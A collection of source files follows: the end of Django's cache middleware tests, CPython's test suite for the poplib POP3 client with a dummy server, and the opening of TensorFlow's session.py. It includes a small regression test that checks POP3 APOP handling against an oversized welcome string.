request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
content = 'Check for cache with QUERY_STRING'
def get_response(req):
return HttpResponse(content)
UpdateCacheMiddleware(get_response)(request)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
# The cache can be recovered
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
def get_stream_response(req):
return StreamingHttpResponse(['Check for cache with streaming content.'])
UpdateCacheMiddleware(get_stream_response)(request)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
factory = RequestFactory()
def setUp(self):
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super().tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If only one argument is passed in construction, it's being used as
# middleware.
middleware = CacheMiddleware(empty_response)
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache, self.other_cache)
# If more arguments are being passed in construction, it's being used
# as a decorator. First, test with "defaults":
as_view_decorator = CacheMiddleware(empty_response, cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
# Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_alias, 'default')
self.assertEqual(as_view_decorator.cache, self.default_cache)
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(
hello_world_view, cache_timeout=60, cache_alias='other', key_prefix='foo'
)
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
self.assertEqual(as_view_decorator_with_custom.cache, self.other_cache)
def test_update_cache_middleware_constructor(self):
middleware = UpdateCacheMiddleware(empty_response)
self.assertEqual(middleware.cache_timeout, 30)
self.assertIsNone(middleware.page_timeout)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache, self.other_cache)
def test_fetch_cache_middleware_constructor(self):
middleware = FetchFromCacheMiddleware(empty_response)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache, self.other_cache)
def test_middleware(self):
middleware = CacheMiddleware(hello_world_view)
prefix_middleware = CacheMiddleware(hello_world_view, key_prefix='prefix1')
timeout_middleware = CacheMiddleware(hello_world_view, cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_cache_page_timeout(self):
# Page timeout takes precedence over the "max-age" section of the
# "Cache-Control".
tests = [
(1, 3), # max_age < page_timeout.
(3, 1), # max_age > page_timeout.
]
for max_age, page_timeout in tests:
with self.subTest(max_age=max_age, page_timeout=page_timeout):
view = cache_page(timeout=page_timeout)(
cache_control(max_age=max_age)(hello_world_view)
)
request = self.factory.get('/view/')
response = view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
time.sleep(1)
response = view(request, '2')
self.assertEqual(
response.content,
b'Hello World 1' if page_timeout > max_age else b'Hello World 2',
)
cache.clear()
def test_cached_control_private_not_cached(self):
"""Responses with 'Cache-Control: private' are not cached."""
view_with_private_cache = cache_page(3)(cache_control(private=True)(hello_world_view))
request = self.factory.get('/view/')
response = view_with_private_cache(request, '1')
self.assertEqual(response.content, b'Hello World 1')
response = view_with_private_cache(request, '2')
self.assertEqual(response.content, b'Hello World 2')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
request = self.factory.get('/view/')
csrf_middleware = CsrfViewMiddleware(csrf_view)
csrf_middleware.process_view(request, csrf_view, (), {})
cache_middleware = CacheMiddleware(csrf_middleware)
self.assertIsNone(cache_middleware.process_request(request))
cache_middleware(request)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
def test_304_response_has_http_caching_headers_but_not_cached(self):
original_view = mock.Mock(return_value=HttpResponseNotModified())
view = cache_page(2)(original_view)
request = self.factory.get('/view/')
# The view shouldn't be cached on the second call.
view(request).close()
response = view(request)
response.close()
self.assertEqual(original_view.call_count, 2)
self.assertIsInstance(response, HttpResponseNotModified)
self.assertIn('Cache-Control', response)
self.assertIn('Expires', response)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the ETag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response.headers['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response.headers['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key, 'template.cache.foo.493e283d571a73056196f1a68efd0f66')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key, 'template.cache.bar.17c1a507a0cb58384f4c639067a93520')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key, 'template.cache.spam.06c8ae8e8c430b69fb0a6443504153dc')
def test_with_ints_vary_on(self):
key = make_template_fragment_key('foo', [1, 2, 3, 4, 5])
self.assertEqual(key, 'template.cache.foo.7ae8fd2e0d25d651c683bdeebdb29461')
def test_with_unicode_vary_on(self):
key = make_template_fragment_key('foo', ['42º', '😀'])
self.assertEqual(key, 'template.cache.foo.7ced1c94e543668590ba39b3c08b0237')
def test_long_vary_on(self):
key = make_template_fragment_key('foo', ['x' * 10000])
self.assertEqual(key, 'template.cache.foo.3670b349b5124aa56bdb50678b02b23a')
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
def test_nonexistent_alias(self):
msg = "The connection 'nonexistent' doesn't exist."
with self.assertRaisesMessage(InvalidCacheBackendError, msg):
caches['nonexistent']
def test_nonexistent_backend(self):
test_caches = CacheHandler({
'invalid_backend': {
'BACKEND': 'django.nonexistent.NonexistentBackend',
},
})
msg = (
"Could not find backend 'django.nonexistent.NonexistentBackend': "
"No module named 'django.nonexistent'"
)
with self.assertRaisesMessage(InvalidCacheBackendError, msg):
test_caches['invalid_backend']
def test_all(self):
test_caches = CacheHandler({
'cache_1': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
},
'cache_2': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
},
})
self.assertEqual(test_caches.all(initialized_only=True), [])
cache_1 = test_caches['cache_1']
self.assertEqual(test_caches.all(initialized_only=True), [cache_1])
self.assertEqual(len(test_caches.all()), 2)
# .all() initializes all caches.
self.assertEqual(len(test_caches.all(initialized_only=True)), 2)
self.assertEqual(test_caches.all(), test_caches.all(initialized_only=True))
|
test_poplib.py
|
"""Test script for poplib module."""
# Modified by Giampaolo Rodola' to give poplib.POP3 and poplib.POP3_SSL
# a real test suite
import poplib
import asyncore
import asynchat
import socket
import os
import errno
import threading
import unittest
from unittest import TestCase, skipUnless
from test import support as test_support
from test.support import hashlib_helper
from test.support import socket_helper
HOST = socket_helper.HOST
PORT = 0
SUPPORTS_SSL = False
if hasattr(poplib, 'POP3_SSL'):
import ssl
SUPPORTS_SSL = True
CERTFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "keycert3.pem")
CAFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "pycacert.pem")
requires_ssl = skipUnless(SUPPORTS_SSL, 'SSL not supported')
# the dummy data returned by server when LIST and RETR commands are issued
LIST_RESP = b'1 1\r\n2 2\r\n3 3\r\n4 4\r\n5 5\r\n.\r\n'
RETR_RESP = b"""From: [email protected]\
\r\nContent-Type: text/plain\r\n\
MIME-Version: 1.0\r\n\
Subject: Dummy\r\n\
\r\n\
line1\r\n\
line2\r\n\
line3\r\n\
.\r\n"""
class DummyPOP3Handler(asynchat.async_chat):
CAPAS = {'UIDL': [], 'IMPLEMENTATION': ['python-testlib-pop-server']}
enable_UTF8 = False
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
self.tls_active = False
self.tls_starting = False
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer)
line = str(line, 'ISO-8859-1')
self.in_buffer = []
cmd = line.split(' ')[0].lower()
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('-ERR unrecognized POP3 command "%s".' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data.encode("ISO-8859-1") + b'\r\n')
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
if arg != "guido":
self.push("-ERR no such user")
self.push('+OK password required')
def cmd_pass(self, arg):
if arg != "python":
self.push("-ERR wrong password")
self.push('+OK 10 messages')
def cmd_stat(self, arg):
self.push('+OK 10 100')
def cmd_list(self, arg):
if arg:
self.push('+OK %s %s' % (arg, arg))
else:
self.push('+OK')
asynchat.async_chat.push(self, LIST_RESP)
cmd_uidl = cmd_list
def cmd_retr(self, arg):
self.push('+OK %s bytes' %len(RETR_RESP))
asynchat.async_chat.push(self, RETR_RESP)
cmd_top = cmd_retr
def cmd_dele(self, arg):
self.push('+OK message marked for deletion.')
def cmd_noop(self, arg):
self.push('+OK done nothing.')
def cmd_rpop(self, arg):
self.push('+OK done nothing.')
def cmd_apop(self, arg):
self.push('+OK done nothing.')
def cmd_quit(self, arg):
self.push('+OK closing.')
self.close_when_done()
def _get_capas(self):
_capas = dict(self.CAPAS)
if not self.tls_active and SUPPORTS_SSL:
_capas['STLS'] = []
return _capas
def cmd_capa(self, arg):
self.push('+OK Capability list follows')
if self._get_capas():
for cap, params in self._get_capas().items():
_ln = [cap]
if params:
_ln.extend(params)
self.push(' '.join(_ln))
self.push('.')
def cmd_utf8(self, arg):
self.push('+OK I know RFC6856'
if self.enable_UTF8
else '-ERR What is UTF8?!')
if SUPPORTS_SSL:
def cmd_stls(self, arg):
if self.tls_active is False:
self.push('+OK Begin TLS negotiation')
context = ssl.SSLContext()
context.load_cert_chain(CERTFILE)
tls_sock = context.wrap_socket(self.socket,
server_side=True,
do_handshake_on_connect=False,
suppress_ragged_eofs=False)
self.del_channel()
self.set_socket(tls_sock)
self.tls_active = True
self.tls_starting = True
self.in_buffer = []
self._do_tls_handshake()
else:
self.push('-ERR Command not permitted when TLS active')
def _do_tls_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
# TODO: SSLError does not expose alert information
elif ("SSLV3_ALERT_BAD_CERTIFICATE" in err.args[1] or
"SSLV3_ALERT_CERTIFICATE_UNKNOWN" in err.args[1]):
return self.handle_close()
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self.tls_active = True
self.tls_starting = False
def handle_read(self):
if self.tls_starting:
self._do_tls_handshake()
else:
try:
asynchat.async_chat.handle_read(self)
except ssl.SSLEOFError:
self.handle_close()
class DummyPOP3Server(asyncore.dispatcher, threading.Thread):
handler = DummyPOP3Handler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.daemon = True
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
try:
while self.active and asyncore.socket_map:
with self.active_lock:
asyncore.loop(timeout=0.1, count=1)
finally:
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
class TestPOP3Class(TestCase):
def assertOK(self, resp):
self.assertTrue(resp.startswith(b"+OK"))
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.start()
self.client = poplib.POP3(self.server.host, self.server.port,
timeout=test_support.LOOPBACK_TIMEOUT)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(),
b'+OK dummy pop3 server ready. <timestamp>')
def test_exceptions(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd, 'echo -err')
def test_user(self):
self.assertOK(self.client.user('guido'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_pass_(self):
self.assertOK(self.client.pass_('python'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_stat(self):
self.assertEqual(self.client.stat(), (10, 100))
def test_list(self):
self.assertEqual(self.client.list()[1:],
([b'1 1', b'2 2', b'3 3', b'4 4', b'5 5'],
25))
self.assertTrue(self.client.list('1').endswith(b"OK 1 1"))
def test_retr(self):
expected = (b'+OK 116 bytes',
[b'From: [email protected]', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy',
b'', b'line1', b'line2', b'line3'],
113)
foo = self.client.retr('foo')
self.assertEqual(foo, expected)
def test_too_long_lines(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd,
'echo +%s' % ((poplib._MAXLINE + 10) * 'a'))
def test_dele(self):
self.assertOK(self.client.dele('foo'))
def test_noop(self):
self.assertOK(self.client.noop())
def test_rpop(self):
self.assertOK(self.client.rpop('foo'))
@hashlib_helper.requires_hashdigest('md5', openssl=True)
def test_apop_normal(self):
self.assertOK(self.client.apop('foo', 'dummypassword'))
@hashlib_helper.requires_hashdigest('md5', openssl=True)
def test_apop_REDOS(self):
# Replace welcome with very long evil welcome.
# NB The upper bound on welcome length is currently 2048.
# At this length, evil input makes each apop call take
# on the order of milliseconds instead of microseconds.
evil_welcome = b'+OK' + (b'<' * 1000000)
with test_support.swap_attr(self.client, 'welcome', evil_welcome):
# The evil welcome is invalid, so apop should throw.
self.assertRaises(poplib.error_proto, self.client.apop, 'a', 'kb')
def test_top(self):
expected = (b'+OK 116 bytes',
[b'From: [email protected]', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy', b'',
b'line1', b'line2', b'line3'],
113)
self.assertEqual(self.client.top(1, 1), expected)
def test_uidl(self):
self.client.uidl()
self.client.uidl('foo')
def test_utf8_raises_if_unsupported(self):
self.server.handler.enable_UTF8 = False
self.assertRaises(poplib.error_proto, self.client.utf8)
def test_utf8(self):
self.server.handler.enable_UTF8 = True
expected = b'+OK I know RFC6856'
result = self.client.utf8()
self.assertEqual(result, expected)
def test_capa(self):
capa = self.client.capa()
self.assertTrue('IMPLEMENTATION' in capa.keys())
def test_quit(self):
resp = self.client.quit()
self.assertTrue(resp)
self.assertIsNone(self.client.sock)
self.assertIsNone(self.client.file)
@requires_ssl
def test_stls_capa(self):
capa = self.client.capa()
self.assertTrue('STLS' in capa.keys())
@requires_ssl
def test_stls(self):
expected = b'+OK Begin TLS negotiation'
resp = self.client.stls()
self.assertEqual(resp, expected)
@requires_ssl
def test_stls_context(self):
expected = b'+OK Begin TLS negotiation'
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(CAFILE)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.check_hostname, True)
with self.assertRaises(ssl.CertificateError):
resp = self.client.stls(context=ctx)
self.client = poplib.POP3("localhost", self.server.port,
timeout=test_support.LOOPBACK_TIMEOUT)
resp = self.client.stls(context=ctx)
self.assertEqual(resp, expected)
if SUPPORTS_SSL:
from test.test_ftplib import SSLConnection
class DummyPOP3_SSLHandler(SSLConnection, DummyPOP3Handler):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.secure_connection()
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
self.tls_active = True
self.tls_starting = False
@requires_ssl
class TestPOP3_SSLClass(TestPOP3Class):
# repeat previous tests by using poplib.POP3_SSL
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.handler = DummyPOP3_SSLHandler
self.server.start()
self.client = poplib.POP3_SSL(self.server.host, self.server.port)
def test__all__(self):
self.assertIn('POP3_SSL', poplib.__all__)
def test_context(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, certfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE,
certfile=CERTFILE, context=ctx)
self.client.quit()
self.client = poplib.POP3_SSL(self.server.host, self.server.port,
context=ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.assertIs(self.client.sock.context, ctx)
self.assertTrue(self.client.noop().startswith(b'+OK'))
def test_stls(self):
self.assertRaises(poplib.error_proto, self.client.stls)
test_stls_context = test_stls
def test_stls_capa(self):
capa = self.client.capa()
self.assertFalse('STLS' in capa.keys())
@requires_ssl
class TestPOP3_TLSClass(TestPOP3Class):
# repeat previous tests by using poplib.POP3.stls()
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.start()
self.client = poplib.POP3(self.server.host, self.server.port,
timeout=test_support.LOOPBACK_TIMEOUT)
self.client.stls()
def tearDown(self):
if self.client.file is not None and self.client.sock is not None:
try:
self.client.quit()
except poplib.error_proto:
# happens in the test_too_long_lines case; the overlong
# response will be treated as response to QUIT and raise
# this exception
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
def test_stls(self):
self.assertRaises(poplib.error_proto, self.client.stls)
test_stls_context = test_stls
def test_stls_capa(self):
capa = self.client.capa()
self.assertFalse(b'STLS' in capa.keys())
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(60) # Safety net. Look issue 11812
self.port = socket_helper.bind_port(self.sock)
self.thread = threading.Thread(target=self.server, args=(self.evt, self.sock))
self.thread.daemon = True
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
# Explicitly clear the attribute to prevent dangling thread
self.thread = None
def server(self, evt, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
conn.send(b"+ Hola mundo\n")
conn.close()
except socket.timeout:
pass
finally:
serv.close()
def testTimeoutDefault(self):
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(test_support.LOOPBACK_TIMEOUT)
try:
pop = poplib.POP3(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(pop.sock.gettimeout(), test_support.LOOPBACK_TIMEOUT)
pop.close()
def testTimeoutNone(self):
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(pop.sock.gettimeout())
pop.close()
def testTimeoutValue(self):
pop = poplib.POP3(HOST, self.port, timeout=test_support.LOOPBACK_TIMEOUT)
self.assertEqual(pop.sock.gettimeout(), test_support.LOOPBACK_TIMEOUT)
pop.close()
with self.assertRaises(ValueError):
poplib.POP3(HOST, self.port, timeout=0)
def setUpModule():
thread_info = test_support.threading_setup()
unittest.addModuleCleanup(test_support.threading_cleanup, *thread_info)
if __name__ == '__main__':
unittest.main()
|
session.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A client interface for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import re
import threading
import warnings
import numpy as np
import wrapt
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow as tf_session
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import device
from tensorflow.python.framework import error_interpolation
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import session_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training.experimental import mixed_precision_global_state
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.compat import collections_abc
_python_session_create_counter = monitoring.Counter(
'/tensorflow/api/python/session_create_counter',
'Counter for number of sessions created in Python.')
class SessionInterface(object):
"""Base class for implementations of TensorFlow client sessions."""
@property
def graph(self):
